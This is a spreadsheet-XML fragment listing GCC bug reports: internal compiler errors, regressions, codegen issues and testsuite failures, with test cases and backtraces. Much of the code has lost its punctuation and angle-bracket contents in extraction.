SunOS iridium 5.6 Generic_105181-20 sun4u sparc SUNWUltra-5_10</t>
  </si>
  <si>
    <t>GCC-64778</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE on invalid code on x86_64-linux-gnu: tree check: expected class â€˜typeâ€™ have â€˜exceptionalâ€™ (error_mark) in create_tmp_from_val at gimplify.c:491</t>
  </si>
  <si>
    <t>The following (invalid) code causes an ICE when compiled with the current gcc trunk on x86_64-linux-gnu. 
It is a regression from 4.9.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 5.0.0 20150122 (experimental) [trunk revision 220011] (GCC) 
$ 
$ gcc-4.9 -c small.c
small.c: In function â€˜fooâ€™:
small.c:4:13: error: expected expression before â€˜â€™ token
   a ^= foo ()
             ^
small.c:4:8: error: too many arguments to function â€˜fooâ€™
   a ^= foo ()
        ^
small.c:1:5: note: declared here
 int foo (int p)
     ^
small.c:4: confused by earlier errors bailing out
$ 
$ gcc-trunk -c small.c
small.c: In function â€˜fooâ€™:
small.c:4:13: error: expected expression before â€˜â€™ token
   a ^= foo ()
             ^
small.c:4:8: error: too many arguments to function â€˜fooâ€™
   a ^= foo ()
        ^
small.c:1:5: note: declared here
 int foo (int p)
     ^
small.c:4:8: internal compiler error: tree check: expected class â€˜typeâ€™ have â€˜exceptionalâ€™ (error_mark) in create_tmp_from_val at gimplify.c:491
   a ^= foo ()
        ^
0xce76c7 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
	../../gcc-trunk/gcc/tree.c:9341
0x89cb90 tree_class_check(tree_node* tree_code_class char const* int char const*)
	../../gcc-trunk/gcc/tree.h:2969
0x89cb90 create_tmp_from_val
	../../gcc-trunk/gcc/gimplify.c:491
0x89cb90 lookup_tmp_var
	../../gcc-trunk/gcc/gimplify.c:527
0x89cb90 internal_get_tmp_var
	../../gcc-trunk/gcc/gimplify.c:557
0x896299 get_initialized_tmp_var(tree_node* gimple_statement_base** gimple_statement_base**)
	../../gcc-trunk/gcc/gimplify.c:594
0x896299 gimplify_save_expr
	../../gcc-trunk/gcc/gimplify.c:4882
0x896299 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
	../../gcc-trunk/gcc/gimplify.c:8183
0x89a1f6 gimplify_stmt(tree_node** gimple_statement_base**)
	../../gcc-trunk/gcc/gimplify.c:5514
0x89a9f1 gimplify_compound_expr
	../../gcc-trunk/gcc/gimplify.c:4837
0x897063 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
	../../gcc-trunk/gcc/gimplify.c:7886
0x89a1f6 gimplify_stmt(tree_node** gimple_statement_base**)
	../../gcc-trunk/gcc/gimplify.c:5514
0x89738b gimplify_statement_list
	../../gcc-trunk/gcc/gimplify.c:1483
0x89738b gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
	../../gcc-trunk/gcc/gimplify.c:8312
0x89a1f6 gimplify_stmt(tree_node** gimple_statement_base**)
	../../gcc-trunk/gcc/gimplify.c:5514
0x89afc5 gimplify_bind_expr
	../../gcc-trunk/gcc/gimplify.c:1132
0x8957ac gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
	../../gcc-trunk/gcc/gimplify.c:8094
0x89a1f6 gimplify_stmt(tree_node** gimple_statement_base**)
	../../gcc-trunk/gcc/gimplify.c:5514
0x89ba7b gimplify_body(tree_node* bool)
	../../gcc-trunk/gcc/gimplify.c:9048
0x89c066 gimplify_function_tree(tree_node*)
	../../gcc-trunk/gcc/gimplify.c:9202
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
--------------------
int foo (int p)
{
  int a 
  a ^= foo ()
  return a 
}</t>
  </si>
  <si>
    <t>GCC-31932</t>
  </si>
  <si>
    <t>cpp -f*-charset and gcj --encoding accept no values except UTF-8</t>
  </si>
  <si>
    <t>Parts of gcc are compiled without libiconv even if it's present in the system and --with-libiconv-prefix specified correctly.
The reason for this is usage of HAVE_ICONV_H macro.
1. The check for iconv.h in configure does not use the value of --with-libiconv-prefix option.
2. HAVE_ICONV_H is useless because check for libiconv uses iconv.h anyway.
3. HAVE_ICONV is changed in some source files like this:
#ifndef HAVE_ICONV_H
#undef HAVE_ICONV
#endif
- which is inherently incorrect in and of itself: any information produced by configure must not be changed in the source code. If configure tests don't work right - fix them but all source code must be compiled with the same global settings.</t>
  </si>
  <si>
    <t>serg</t>
  </si>
  <si>
    <t>GCC-14468</t>
  </si>
  <si>
    <t>[tree-ssa] ICE in verify_stmts (tree-cfg.c)</t>
  </si>
  <si>
    <t>zztest.cpp: In function `void foo()':
zztest.cpp:9: error: Invalid operand to binary operator
(struct N *)i.6
zztest.cpp:9: internal compiler error: verify_stmts failed.
class N {
public:
	N() {}
}
N x(N N) {return N()}
void foo()
{
	N bc
	static N a[2] // no ICE without static
	for (unsigned i=1 i &lt; 2 ++i)
		a[i] = x(a[i-1] b)
}
Reading specs from /usr/local/lib/gcc/i686-pc-cygwin/3.5-tree-ssa/specs
Configured with: ./configure --enable-languages=cc++ : (reconfigured)
./configure --enable-language
s=cc++ : (reconfigured) ./configure --enable-languages=cc++
Thread model: single
gcc version 3.5-tree-ssa 20040307 (merged 20040305)
The code worked with GCC 3.5.0 (some days ago).</t>
  </si>
  <si>
    <t>epanelelytha</t>
  </si>
  <si>
    <t>GCC-38640</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE with decltype of template value parameter</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 4.3.0
(when __decltype was introduced):
================================================
template void foo(__decltype(N))
================================================
bug.cc:1: internal compiler error: in finish_decltype_type at cp/semantics.c:4645</t>
  </si>
  <si>
    <t>GCC-67339</t>
  </si>
  <si>
    <t>[5/6 Regression] Segfault when parsing a typename involving a template-alias</t>
  </si>
  <si>
    <t>Created attachment 36250
Small testcase
Hi
the following snippet crashes in trunk (6.0.0 20150824).
-- test.ii
template 
struct A
{
    void foo()
    template 
        using N = void (T::*)(S W) const 
}
template 
void A::foo()
{
    typename A::template N fun = 
}
-- end of test.ii
$ g++ --version 
g++ (GCC) 6.0.0 20150824 (experimental)
$ g++ -c test.ii
test.ii: In member function 'void A::foo()':
test.ii:12:29: internal compiler error: Segmentation fault
     typename A::template N fun = 
                             ^
0xc7cf1f crash_signal
	../../gcc-svn/gcc/toplev.c:352
0x6efffd cp_parser_elaborated_type_specifier
	../../gcc-svn/gcc/cp/parser.c:16189
0x6de047 cp_parser_type_specifier
	../../gcc-svn/gcc/cp/parser.c:15104
0x6edf01 cp_parser_decl_specifier_seq
	../../gcc-svn/gcc/cp/parser.c:12042
0x7025a1 cp_parser_simple_declaration
	../../gcc-svn/gcc/cp/parser.c:11608
0x6fbf54 cp_parser_block_declaration
	../../gcc-svn/gcc/cp/parser.c:11555
0x6fcd61 cp_parser_declaration_statement
	../../gcc-svn/gcc/cp/parser.c:11174
0x6fdb8c cp_parser_statement
	../../gcc-svn/gcc/cp/parser.c:9894
0x6fe162 cp_parser_statement_seq_opt
	../../gcc-svn/gcc/cp/parser.c:10172
0x6fe2bb cp_parser_compound_statement
	../../gcc-svn/gcc/cp/parser.c:10126
0x6fe4eb cp_parser_function_body
	../../gcc-svn/gcc/cp/parser.c:19783
0x6fe4eb cp_parser_ctor_initializer_opt_and_function_body
	../../gcc-svn/gcc/cp/parser.c:19819
0x6ff369 cp_parser_function_definition_after_declarator
	../../gcc-svn/gcc/cp/parser.c:24426
0x70022c cp_parser_function_definition_from_specifiers_and_declarator
	../../gcc-svn/gcc/cp/parser.c:24338
0x70022c cp_parser_init_declarator
	../../gcc-svn/gcc/cp/parser.c:17619
0x7005ae cp_parser_single_declaration
	../../gcc-svn/gcc/cp/parser.c:24868
0x70074b cp_parser_template_declaration_after_parameters
	../../gcc-svn/gcc/cp/parser.c:24487
0x701334 cp_parser_explicit_template_declaration
	../../gcc-svn/gcc/cp/parser.c:24722
0x701334 cp_parser_template_declaration_after_export
	../../gcc-svn/gcc/cp/parser.c:24740
0x708109 cp_parser_declaration
	../../gcc-svn/gcc/cp/parser.c:11412
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
It looks like a regression introduced in 5.1: both GCC 5.1.0 and GCC 5.2.0 crash while 4.9.3 works fine.
Best regards</t>
  </si>
  <si>
    <t>GCC-4923</t>
  </si>
  <si>
    <t>Concatenation appears to handle whitespace incorrectly</t>
  </si>
  <si>
    <t>With the ## operator if one of the arguments is a macro function the whitespace around the arguments is not eaten which is contrary to the GNU cpp documentation.
Release:
gcc version 2.95.2 20000220
Environment:
(Debian) Linux 2.4.12-shells1 i686
How-To-Repeat:
/* test.h */
#define FOO(x) x
#define BAR    FOO(abc) ## def
BAR
/* cpp &lt; test.h */
# 1 
 abc  def</t>
  </si>
  <si>
    <t>s0009525</t>
  </si>
  <si>
    <t>GCC-56565</t>
  </si>
  <si>
    <t>lambda function in NSMI fails to capture non-static data member.</t>
  </si>
  <si>
    <t>This code is accepted by clang.
 struct bug { int a int *b = [ }() }
But GCC (4.7 and trunk) report a compilation error:
error: invalid use of non-static data member â€˜bug::aâ€™
 struct bug { int a int *b = [ }() }
                  ^
error: from this location
 struct bug { int a int *b = [ }() }
                                           ^
calling this-&gt;a  works.</t>
  </si>
  <si>
    <t>GCC-3714</t>
  </si>
  <si>
    <t>gcc 3.0 ICE during bootstrap for arm-unknown-netbsd1.5.1</t>
  </si>
  <si>
    <t>Gcc reports an ICE during bootstrap of the gcc-3.0 tar ball.
The build is configured by just running 'configure' without any parameters.
The ICE occures when compiling /libstdc++-v3/libsupc++/eh_aux_runtime.c as in:
/usr/local/tmp/gcc-3.0/build/gcc/xgcc -B/usr/local/tmp/gcc-3.0/build/gcc/ -nostdinc++ -L/usr/local/tmp/gcc-3.0/build/arm-unknown-netbsd1.5.1/libstdc++-v3/src -L/usr/local/tmp/gcc-3.0/build/arm-unknown-netbsd1.5.1/libstdc++-v3/src/.libs -B/usr/local/arm-unknown-netbsd1.5.1/bin/ -B/usr/local/arm-unknown-netbsd1.5.1/lib/ -isystem /usr/local/arm-unknown-netbsd1.5.1/include -I../../../../gcc-3.0/libstdc++-v3/../gcc -I../../../../gcc-3.0/libstdc++-v3/../include -I../../../../gcc-3.0/libstdc++-v3/include -I../../../../gcc-3.0/libstdc++-v3/include/std -I../../../../gcc-3.0/libstdc++-v3/include/c_std -I../include -I../../../../gcc-3.0/libstdc++-v3/libsupc++ -g -O2 -fno-implicit-templates -Wall -Wno-format -W -Wwrite-strings -Winline -fdiagnostics-show-location=once -g -c ../../../../gcc-3.0/libstdc++-v3/libsupc++/eh_aux_runtime.cc -fPIC -DPIC -o eh_aux_runtime.o
../../../../gcc-3.0/libstdc++-v3/libsupc++/eh_aux_runtime.cc: In function `void 
   __cxa_bad_cast()':
../../../../gcc-3.0/libstdc++-v3/libsupc++/eh_aux_runtime.cc:46: Unrecognizable 
   insn:
(insn 342 340 344 (set (reg/f:SI 84)
        (label_ref:SI 353)) -1 (nil)
    (insn_list:REG_LABEL 353 (expr_list:REG_EQUAL (label_ref:SI 353)
            (nil))))
../../../../gcc-3.0/libstdc++-v3/libsupc++/eh_aux_runtime.cc:46: Internal 
   compiler error in extract_insn at recog.c:2210
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I have attached the .ii file.
Release:
gcc-3.0
Environment:
arm NetBSD-1.5.1 gcc 3.0</t>
  </si>
  <si>
    <t>cato</t>
  </si>
  <si>
    <t>GCC-41697</t>
  </si>
  <si>
    <t>ICE on gcc.c-torture/compile/20090917-1.c</t>
  </si>
  <si>
    <t>The test case gcc.c-torture/compile/20090917-1.c looks pretty bogus (particularly the first argument to am_vector_index_for_loop) but it shouldn't ICE which it does on IA64 HP-UX and Linux when compiled with -O3.
The ICE happens in the selective scheduler.  I am not sure if the problem is platform specific or not I don't see it on any other platforms.
The error:
20090917-1.c: In function 'build_access_matrix':
20090917-1.c:55:1: internal compiler error: vector VEC(edgebase) index domain error in _eligible_successor_edge_p at sel-sched-ir.h:1398
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-13676</t>
  </si>
  <si>
    <t>GCC failes to recognize files ending in .hpp as headers to be precompiled</t>
  </si>
  <si>
    <t>Pass any header file with a suffix ending in .hpp to the compiler.  If -c is
specified you recieve the message that linker input file foo.hpp ignored
because linking not done and if -c is not specified it is passed on verbatim
to the linker which cannot subsequently determine the file type.
I think the most robust fix for this is to supply an argument to the -x flag
such as c++-pch or c-pch to force the compiler to treat it as a header file
to be pre-compiled.  This would also enable projects that do more exotic things
with #include to take advantage of PCH.</t>
  </si>
  <si>
    <t>GCC-66046</t>
  </si>
  <si>
    <t>UBSan output pattern tests fail on target ARM board.</t>
  </si>
  <si>
    <t>I see lots of output pattern test failures in UBSan testsuite running it on target ARM board:
FAIL: c-c++-common/ubsan/object-size-1.c  -O2  output pattern test
FAIL: c-c++-common/ubsan/object-size-10.c  -O2  output pattern test
FAIL: c-c++-common/ubsan/object-size-4.c  -O2  output pattern test
FAIL: c-c++-common/ubsan/object-size-5.c  -O2  output pattern test
FAIL: c-c++-common/ubsan/overflow-negate-3.c  -O2  output pattern test
FAIL: c-c++-common/ubsan/overflow-sub-4.c  -O0  output pattern test
.................
Looking to the failing tests I've noticed that they all try to match the last (\n|\r\n|\r) for example overflow-negate-3.c:
/* { dg-do run } */
/* { dg-options -fsanitize=signed-integer-overflow } */
#define INT_MIN (-__INT_MAX__ - 1)
int
main ()
{
  int x = INT_MIN
  int y
  asm ( : +g (x))
  y = -(-x)
  asm ( : +g (y))
  y = -(-INT_MIN)
  asm ( : +g (y))
}
/* { dg-output negation of -2147483648 cannot be represented in type 'int'\[^\n\r]* cast to an unsigned type to negate this value to itself\[^\n\r]*(\n|\r\n|\r) } */
/* { dg-output \[^\n\r]*negation of -2147483648 cannot be represented in type 'int'\[^\n\r]* cast to an unsigned type to negate this value to itself\[^\n\r]*(\n|\r\n|\r) } */
/* { dg-output \[^\n\r]*negation of -2147483648 cannot be represented in type 'int'\[^\n\r]* cast to an unsigned type to negate this value to itself\[^\n\r]*(\n|\r\n|\r) } */
/* { dg-output \[^\n\r]*negation of -2147483648 cannot be represented in type 'int'\[^\n\r]* cast to an unsigned type to negate this value to itself\[^\n\r]*(\n|\r\n|\r) } */ &lt;-- matches (\n|\r\n|\r)
But for some reasons Dejagnu eats the last \n when running tests through ssh consider:
$ cat /usr/share/dejagnu/rsh.exp
proc rsh_exec { boardname program pargs inp outp } {
    global timeout
...............
     # Delete one trailing \n because that is what `exec' will do and we want
    # to behave identical to it.
    regsub \n$ $output  output                  &lt;-- delete last \n here
    return [list [expr {$status != 0}] $output]
}
Although the easiest way to fix this is just deleting 'regsub \n$ $output  output' line from rsh_exec I'm not sure that modifying Dejagnu is a good idea. Another option is to postprocess tests output in gcc/testsuite/lib/ubsan-dg.exp just like we do it in gcc/testsuite/lib/asan-dg.exp:
+# Replace ${tool}_load with a wrapper so that we can symbolize the output.
+if { [info procs ${tool}_load] != [list] \
+      &amp;&amp; [info procs saved_ubsan_${tool}_load] == [list] } {
+    rename ${tool}_load saved_ubsan_${tool}_load
+
+    proc ${tool}_load { program args } {
+       global tool
+       set result [eval [list saved_ubsan_${tool}_load $program] $args]
+       set output [lindex $result 1]
+       set result [list [lindex $result 0] ${output}\n]
+       return $result
+    }
+}
+
#
# ubsan_finish -- called at the end of each subdir of tests
#</t>
  </si>
  <si>
    <t>m.ostapenko</t>
  </si>
  <si>
    <t>GCC-66470</t>
  </si>
  <si>
    <t>[4.8/4.9/5/6 Regression] TLS ICE due to ix86_split_long_move</t>
  </si>
  <si>
    <t>extern __thread unsigned long long a[10]
unsigned long long foo (int b) { return a[b] }
or
extern __thread struct S { int a b } a[10]
struct S foo (int b) { return a[b] }
ICE on x86_64-linux/i686-linux with -m32 all optimization levels.  This worked in GCC 3.3.6.
The bug is in ix86_split_long_move when trying to split:
(insn 7 15 13 2 (set (reg:DI 0 ax [92])
        (mem:DI (plus:SI (plus:SI (mult:SI (reg/v:SI 1 dx [orig:89 b ] [89])
                        (const_int 8 [0x8]))
                    (unspec:SI [
                            (const_int 0 [0])
                        ] UNSPEC_TP))
                (reg:SI 0 ax [91])) [1 a S8 A64])) rh1212265.i:2 85 {*movdi_internal}
     (nil))
which while offsettable has collisions == 2 (the MEM uses both dx and ax in the addressing and loads the ax:dx pair).  The splitter assumes it can just use
a lea but lea can't support %gs: (UNSPEC_TP).  So either it has to load from %gs:0 first then do lea or better yet just move UNSPEC_TP part to the individual memory loads.</t>
  </si>
  <si>
    <t>GCC-10281</t>
  </si>
  <si>
    <t>[3.4 regression] ICE in loc_descriptor_from_tree in dwarf2out.c compiling glibc</t>
  </si>
  <si>
    <t xml:space="preserve">From: Janis Johnson 
To: gcc-gnats@gcc.gnu.org gcc-bugs@gcc.gnu.org nobody@gcc.gnu.org
   gcc-prs@gcc.gnu.org janis187@us.ibm.com jason@redhat.com
Cc:  
Subject: Re: debug/10281: [3.4 regression] ICE in loc_descriptor_from_tree in 
 dwarf2out.c compiling glibc
Date: Mon 31 Mar 2003 14:26:22 -0800
 The regression appeared with this patch:
 2003-02-28  Jason Merrill  
       * stor-layout.c (variable_size): Leave a minus 1 outside the
       SAVE_EXPR.
 The hunt was on i686-pc-linux-gnu and used -g with the
 test case in the PR.
 http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit-trail&amp;database=gcc&amp;pr=10281
</t>
  </si>
  <si>
    <t>GCC-33300</t>
  </si>
  <si>
    <t>[libstdc++-v3] 27_io/ios_base/storage/2.cc with -m64 kills Darwin</t>
  </si>
  <si>
    <t>I have posted the following on http://gcc.gnu.org/ml/libstdc++/2007-08/msg00051.html:
&gt; The test libstdc++-v3/testsuite/27_io/ios_base/storage/2.cc passes on
&gt; PPC Darwin 8.10 but when run with -m64 it grabs all the disk space 
&gt; until the system freezes and needs a reboot.
&gt; Is this known?
Since I did not get any answer so far let see if I am luckier on this list!-)
Running the gfortran testsuite I have noticed that the number of cases run is not the same for 32 and 64 modes. Is there a dg directive to prevent a test to be run in either of these modes?</t>
  </si>
  <si>
    <t>GCC-27437</t>
  </si>
  <si>
    <t>-O2 -fsee failures on x86</t>
  </si>
  <si>
    <t>The new SEE pass is turned on by -O3 which introduces several regressions on
Linux/x86 and probably on Linux/x86-64:
http://gcc.gnu.org/ml/gcc-testresults/2006-05/msg00171.html
shows
FAIL: gcc.c-torture/compile/pr20539-1.c  -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: gcc.c-torture/compile/pr20539-1.c  -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/20050121-1.c compilation  -O3 -fomit-frame-pointer 
UNRESOLVED: gcc.c-torture/execute/20050121-1.c execution  -O3 -fomit-frame-pointer 
FAIL: gcc.c-torture/execute/20050121-1.c compilation  -O3 -g 
UNRESOLVED: gcc.c-torture/execute/20050121-1.c execution  -O3 -g 
FAIL: gcc.c-torture/execute/930603-3.c compilation  -O3 -fomit-frame-pointer 
UNRESOLVED: gcc.c-torture/execute/930603-3.c execution  -O3 -fomit-frame-pointer 
FAIL: gcc.c-torture/execute/930603-3.c compilation  -O3 -g 
UNRESOLVED: gcc.c-torture/execute/930603-3.c execution  -O3 -g 
FAIL: gcc.c-torture/execute/arith-rand-ll.c compilation  -O3 -fomit-frame-pointer 
UNRESOLVED: gcc.c-torture/execute/arith-rand-ll.c execution  -O3 -fomit-frame-pointer 
FAIL: gcc.c-torture/execute/arith-rand-ll.c compilation  -O3 -g 
UNRESOLVED: gcc.c-torture/execute/arith-rand-ll.c execution  -O3 -g 
FAIL: gcc.c-torture/unsorted/udivmod4.c  -O3 -fomit-frame-pointer  
FAIL: gcc.c-torture/unsorted/udivmod4.c  -O3 -g
which aren't in
http://gcc.gnu.org/ml/gcc-testresults/2006-05/msg00073.html</t>
  </si>
  <si>
    <t>GCC-64650</t>
  </si>
  <si>
    <t>std::experimental::bad_optional_access is not default constructible</t>
  </si>
  <si>
    <t>This should compile using -std=c++14:
#include 
std::experimental::bad_optional_access e
badopt.cc:3:40: error: no matching function for call to â€˜std::experimental::fundamentals_v1::bad_optional_access::bad_optional_access()â€™
 std::experimental::bad_optional_access e
                                        ^</t>
  </si>
  <si>
    <t>GCC-35791</t>
  </si>
  <si>
    <t>[Ada] V-table messed up with interface composition</t>
  </si>
  <si>
    <t>with Ada.Text_IO
procedure A is
   package Stuff is
      type Base_1 is interface
      procedure P_1 (X : in Base_1) is abstract
      type Base_2 is interface
      procedure P_2 (X : in Base_2) is abstract
      type Middle is interface and Base_1 and Base_2
      type Concrete is new Middle with null record
      procedure P_1 (X : in Concrete)
      procedure P_2 (X : in Concrete)
      function Make_Concrete return Concrete
   end Stuff
   package body Stuff is
      procedure P_1 (X : in Concrete) is
      begin
         Ada.Text_IO.Put_Line (Concrete.P_1)
      end P_1
      procedure P_2 (X : in Concrete) is
      begin
         Ada.Text_IO.Put_Line (Concrete.P_2)
      end P_2
      function Make_Concrete return Concrete is
         C : Concrete
      begin
         return C
      end Make_Concrete
   end Stuff
   use Stuff
   B_1 : Base_1'Class := Make_Concrete
   B_2 : Base_2'Class := Make_Concrete
begin
   B_1.P_1
   B_2.P_2
end
$ gnatmake a
$ ./a
Concrete.P_1
Concrete.P_1
$
In other words both calls dispatched to the same procedure.
Some experiments led me to the interesting observation:
Changing this:
      type Middle is interface and Base_1 and Base_2
to this:
      type Middle is interface and Base_2 and Base_1
results in:
$ ./a
Concrete.P_2
Concrete.P_2
Again both calls dispatched to the same procedure but now I know
that in both cases the dispatch goes to the *first* progenitor of the
Middle interface.
The expected result is:
Concrete.P_1
Concrete.P_2
irrespectively of the interface composition order.
$ gnatmake --version
GNATMAKE 4.4.0 20080314 (experimental) [trunk revision 133226]</t>
  </si>
  <si>
    <t>prog</t>
  </si>
  <si>
    <t>GCC-27999</t>
  </si>
  <si>
    <t>FAIL:   c64005c</t>
  </si>
  <si>
    <t>raised STORAGE_ERROR : stack overflow detected
Stack size is set to 8192 kbytes.  This doesn't happen all
the time.</t>
  </si>
  <si>
    <t>GCC-81502</t>
  </si>
  <si>
    <t>In some cases the data is moved to memory unnecessarily [partial regression]</t>
  </si>
  <si>
    <t>#include 
#include 
#include 
template
int foo(unsigned char (&amp;foo)[SIZE]) {
  __m128i acc = _mm_set_epi32(0 0 0 0)
  size_t i = 0
  for( i + sizeof(__m128i) &lt;= SIZE i += sizeof(__m128i)) {
    __m128i word
    memcpy(
    acc = _mm_add_epi32(word acc)
  }
  if (i != SIZE) {
    __m128i word = _mm_set_epi32(0 0 0 0)
    memcpy( // (1)
    acc = _mm_add_epi32(word acc)
  }
  int res
  memcpy(
  return res
}
int bar(void *ptr) {
  unsigned char buf[sizeof(ptr)]
  memcpy(buf 
  return foo(buf)
}
(yeah code is dummy but it is simplified from real example)
Both in -O2 and -O3 it produces following assembler:
bar(void*):
        movq    %rdi -16(%rsp)
        movq    -16(%rsp) %xmm1
        movq    %xmm1 %xmm0
        movd    %xmm0 %eax
        ret
Line marked as (1) seems to be responsible for unnecessary move to -16(%rsp) even though the whole code does not need touch anything outside registers at all. It doesn't seem to even choose optimal register (chooses %xmm1 instead of %xmm0 adding additional copy).
Non-SSE code is somehow better though seems to have dead moves to memory:
#include 
#include 
#include 
#include 
template
int foo(unsigned char (&amp;foo)[SIZE]) {
  uint64_t acc = 0
  size_t i = 0
  for( i + sizeof(uint64_t) &lt;= SIZE i += sizeof(uint64_t)) {
    uint64_t word
    memcpy(
    acc += word
  }
  if (i != SIZE) {
    uint64_t word = 0
    memcpy(
    acc += word
  }
  int res
  memcpy(
  return res
}
int bar(uint32_t ptr) {
  unsigned char buf[sizeof(ptr)]
  memcpy(buf 
  return foo(buf)
}
bar(unsigned int):
        movq    $0 -8(%rsp)
        movl    %edi %eax
        movl    %edi -8(%rsp)
        ret
PS. It seems to work in first case when type is uint32_t in 6.3 but not in 7.1:
bar(unsigned int): // 6.3
        movl    %edi %eax
        ret
bar(unsigned int): // 7.1
        pxor    %xmm0 %xmm0
        movl    %edi %eax
        movaps  %xmm0 -24(%rsp)
        movq    %rax -24(%rsp)
        movl    -24(%rsp) %eax
        ret</t>
  </si>
  <si>
    <t>GCC-388</t>
  </si>
  <si>
    <t>Bug report</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-Id: 
 Date: Fri 07 Jul 2000 16:35:53 -0400
 This is a MIME message. If you are reading this text you may want to 
 consider changing to a mail reader or gateway that understands how to 
 properly handle MIME multipart messages.
 --=_69313B61.10711D6B
 Content-Type: text/plain charset=US-ASCII
 Content-Transfer-Encoding: quoted-printable
 Content-Disposition: inline
 [john@otis programs]$ g++ -c test.c
 test.c: In method `int matrix::matdim(int int)':
 test.c:37: Internal compiler error.
 test.c:37: Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
 test.c:37: See  for =
 details.
 I was in the process of trying to develop C++ code to implement a =
 2-dimensional array class that allows
 dynamic allocation of arrays of arbitrary size allows the array to be =
 passed to a function using a pointer
 while using automatic declaration and destruction of array objects (I had =
 some trouble using dynamic allocation
 which may be hard to sort out) .The principle of indexing the array using =
 double indirection is explained
 in ( Numerical recipies in C  by William H Press et al.   Cambridge =
 University press page 20).
 I am using a computer with Red Hat Linux release 6.0 (Hedwig).
 My code attached caused the compiler to generate the message above hence =
 this email. If you are aware of a way to solve this problem please let me =
 know.
 Thanks
 John Nixon
Release:
2.95.2
How-To-Repeat:
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
/* compile with
g++ -c test.c
link with
g++ -o prog test.o 
*/
template
class matrix{
  int nrowsncols
  T **x
  T *y[200]
  T z[200][200]
public:
  void matdim(int iint j){
    cout.setf(ios::unitbuf)//allows output to be obtained even if program crashes.  
    int k
    nrows=incols=j
    cout&lt;&lt;nrows and ncols set\n
    x=
    cout&lt;&lt;x initialized\n
    y[0]=(T*[200])
    cout&lt;&lt;y[0] initialized\n
    for(int k=1k&lt;nrowsk++){*y[k]=*y[k-1]+ncols*sizeof(T)}
    cout&lt;&lt;y[k] initialized\n}
  T &amp;val(int iint j){
    if(i&gt;=0 &amp;&amp; i&lt; nrows){
      if(j&gt;=0 }
      else {cout&lt;&lt;column (second) index &lt;&lt;j&lt;&lt; out of range\nexit(1)}}
    else {cout&lt;&lt;row (first) index &lt;&lt;i&lt;&lt; out of range\nexit(1)}}
} 
int main(){
  matrix a
  cout&lt;&lt;Matrix declared\n
  a.matdim(22)
  cout&lt;&lt;matrix dimensioned\n
  int kl
  for(k=0k&lt;2k++){for(l=0l&lt;2l++)a.val(kl)=k+l+1}
  cout &lt;&lt;matrix defined\n
  for(k=0k&lt;2k++){for(l=0l&lt;2l++)cout&lt;&lt;a.val(kl)&lt;&lt; cout&lt;&lt;'\n'}
  return 0
}</t>
  </si>
  <si>
    <t>GCC-36227</t>
  </si>
  <si>
    <t>[4.3 Regression] POINTER_PLUS folding introduces undefined overflow</t>
  </si>
  <si>
    <t>unsigned long * sat_add(unsigned long *ptr unsigned long i unsigned long *end)
{
  if ((unsigned long)ptr + i * sizeof(*ptr) &gt; (unsigned long)ptr)
    return ptr + i
  else
    return end
}
is folded to
  if (ptr + (long unsigned int) (i * 8) &gt; ptr)
    {
      return ptr + (long unsigned int) (i * 8)
    }
  else
    {
      return end
    }</t>
  </si>
  <si>
    <t>GCC-5874</t>
  </si>
  <si>
    <t>gcc-3.1 20020304 (prerelease) FAILs in libjava testsuite with RUNTESTFLAGS=--target_board 'unix{-fPIC-fpic}'</t>
  </si>
  <si>
    <t>When running the libjava testsuite I get FAIL like this:
output is:
/share2/gcc-rel/gcc/objdir/gcc/gcjh: unrecognized option `-fPIC'
Try `gcjh --help' for more information.
FAIL: cxxtest header generation
output is:
Release:
gcc-3.1 20020304 (prerelease)
Environment:
Debain 3.0 Woody sparc-linux libc6-2.2.5</t>
  </si>
  <si>
    <t>GCC-25087</t>
  </si>
  <si>
    <t>Error for missing explicit interface needed.</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
SUBROUTINE s(n)
 CHARACTER(LEN=n) EXTERNAL :: a
 write(6*) a(n)
END SUBROUTINE s
FUNCTION a(n)
 CHARACTER(LEN=n) :: a
 a=1111111
END FUNCTION a
PROGRAM TEST
CALL S(3)
END PROGRAM TEST</t>
  </si>
  <si>
    <t>GCC-65091</t>
  </si>
  <si>
    <t>decltype(~arg) fails for template functions</t>
  </si>
  <si>
    <t>Created attachment 34790
ii file generated by -save-temps
The following program does not compile with g++ (although it compiles with clang++):
template
auto foo(T x) -&gt; decltype(~x)
{ return ~x }
int bar()
{ return foo(10) }
ptomulik@tea:$ g++ -std=c++11 -g -O0 -Wall -Wextra -Werror -pedantic -c -o test.o test.cpp
test.cpp: In function â€˜int bar()â€™:
test.cpp:6:16: error: no matching function for call to â€˜foo(int)â€™
 { return foo(10) }
                ^
test.cpp:6:16: note: candidate is:
test.cpp:2:6: note: template decltype (~ x) foo(T)
 auto foo(T x) -&gt; decltype(~x)
      ^
test.cpp:2:6: note:   template argument deduction/substitution failed:
